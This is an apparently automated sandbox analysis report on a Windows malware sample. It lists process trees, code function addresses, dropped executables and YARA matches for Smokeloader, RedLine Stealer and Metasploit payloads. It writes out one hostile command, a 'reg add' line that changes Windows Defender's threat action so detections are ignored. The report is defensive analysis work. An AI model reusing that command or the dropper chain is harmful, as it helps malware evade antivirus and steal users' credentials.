Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00434BF0 3_2_00434BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00509CE0 3_2_00509CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00440DC0 3_2_00440DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004CEF10 3_2_004CEF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004210E0 3_2_004210E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00402100 3_2_00402100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004241E0 3_2_004241E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00441320 3_2_00441320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004213A0 3_2_004213A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004233A0 3_2_004233A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042D420 3_2_0042D420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042A510 3_2_0042A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040B5E0 3_2_0040B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004435F0 3_2_004435F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00422580 3_2_00422580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00405640 3_2_00405640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00424660 3_2_00424660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00517635 3_2_00517635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00402630 3_2_00402630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_005636CC 3_2_005636CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0054E6CA 3_2_0054E6CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00513840 3_2_00513840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00544809 3_2_00544809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00517830 3_2_00517830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00421820 3_2_00421820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0057B914 3_2_0057B914
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041E9E0 3_2_0041E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0044AA40 3_2_0044AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00562AB0 3_2_00562AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00425BD0 3_2_00425BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042DBD0 3_2_0042DBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042CC00 3_2_0042CC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00543E60 3_2_00543E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00552ED0 3_2_00552ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00550E98 3_2_00550E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00401E90 3_2_00401E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00567FBD 3_2_00567FBD
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_0040840C 7_2_0040840C
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_004162A6 8_2_004162A6
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_0040E5A5 8_2_0040E5A5
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_004126B0 8_2_004126B0
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00403A01 8_2_00403A01
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00418EF1 8_2_00418EF1
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00418FCB 8_2_00418FCB
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00408A70 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00402C60 9_2_00402C60
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004248CD 9_2_004248CD
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004120D3 9_2_004120D3
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004249ED 9_2_004249ED
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00422AC7 9_2_00422AC7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00412305 9_2_00412305
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004154F0 9_2_004154F0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00420533 9_2_00420533
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0040E580 9_2_0040E580
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041C599 9_2_0041C599
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041BE73 9_2_0041BE73
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_1000E184 9_2_1000E184
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_100102A0 9_2_100102A0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020D233A 9_2_020D233A
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020E4B34 9_2_020E4B34
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DC0DA 9_2_020DC0DA
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C5E13 9_2_020C5E13
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020D5757 9_2_020D5757
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C5F7B 9_2_020C5F7B
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020E079A 9_2_020E079A
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020CE7E7 9_2_020CE7E7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020E4C54 9_2_020E4C54
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C8CD7 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020D256C 9_2_020D256C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004804C6 11_2_004804C6
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00470950 11_2_00470950
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004352D8 11_2_004352D8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00467710 11_2_00467710
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0043036C 11_2_0043036C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004444D8 11_2_004444D8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004345D4 11_2_004345D4
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00486604 11_2_00486604
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00444A80 11_2_00444A80
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00430EF8 11_2_00430EF8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00445178 11_2_00445178
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045F430 11_2_0045F430
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045B4D8 11_2_0045B4D8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00487564 11_2_00487564
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00445584 11_2_00445584
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00469770 11_2_00469770
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0048D8C4 11_2_0048D8C4
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004519A8 11_2_004519A8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0043DD60 11_2_0043DD60
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Found potential string decryption / allocating functions
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: String function: 020CD9F7 appears 39 times
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: String function: 0040D790 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004172E0 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0053F9A0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00405964 appears 116 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00408C14 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00406ACC appears 41 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00403400 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00445DE4 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 004078FC appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 004344EC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00403494 appears 79 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00457D58 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00453330 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00457B4C appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00403684 appears 221 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 004460B4 appears 59 times
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: String function: 00413954 appears 179 times
One or more processes crash
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7916 -ip 7916
PE file contains executable resources (Code or Archives)
Source: stories[1].exe.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: hI6pMK6rYY2urO_lpGyU85DA.exe.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp.7.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp.7.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp.7.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp.7.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.1416416612.000000000118E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.1417872247.0000000004025000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameVQP.exe\ vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Yara signature match
Source: 00000009.00000002.2102908522.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000009.00000002.2102510892.00000000004AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.1766538879.000000000198E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000A.00000002.1766830141.0000000001B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: univ[1].exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tyq3dazbB0crObgKIDGLxiAO.exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Y-Cleaner.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.adwa.spyw.evad.winEXE@114/107@8/13
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 9_2_00402940
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 7_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 11_2_004555D0
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA, 11_2_00455DF8
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004B2ECF CreateToolhelp32Snapshot,Module32First, 9_2_004B2ECF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004334B0 CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,VariantClear,CoUninitialize, 3_2_004334B0
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource, 7_2_00409BEC
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \BaseNamedObjects\Local\SM0:8124:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7916
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \BaseNamedObjects\Local\SM0:5880:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\KejwopdnfWW_3
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5372:120:WilError_03
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: nine.exe 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: @G@K 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: A@K. 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: two.exe 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: @G@K 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: ZYA. 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: NOSUB 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: GET 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: kc~z 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: ^WB 9_2_004256B0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: @G@K 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: A@K. 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: @G@K 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: ZYA. 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: kc~z 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: @*C 9_2_020C8CD7
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1748876102.00000000036A1000.00000004.00000020.00020000.00000000.sdmp, G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749442825.00000000036A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 57%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Process created: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp "C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp" /SL5="$70060,2863082,54272,C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe"
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process created: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process created: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe "C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe" -i
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7916 -ip 7916
